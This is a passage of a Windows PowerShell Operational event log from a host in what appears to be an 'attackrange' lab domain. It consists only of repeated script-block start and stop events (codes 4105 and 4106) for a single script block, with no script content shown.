Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471116
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471115
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471114
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471113
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471112
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471111
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471110
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471109
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471108
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471107
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471106
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471105
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471104
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471103
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471102
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471101
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471100
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471099
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471098
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471097
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471096
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471095
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471094
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471093
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471092
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471091
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471090
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471089
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471088
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471087
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471086
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471085
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471084
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471083
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471082
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471081
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471080
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471079
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471078
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471077
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471076
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471075
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471074
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471073
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471072
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471071
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471070
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471069
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471068
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471067
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471066
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471065
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471064
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471063
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471062
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
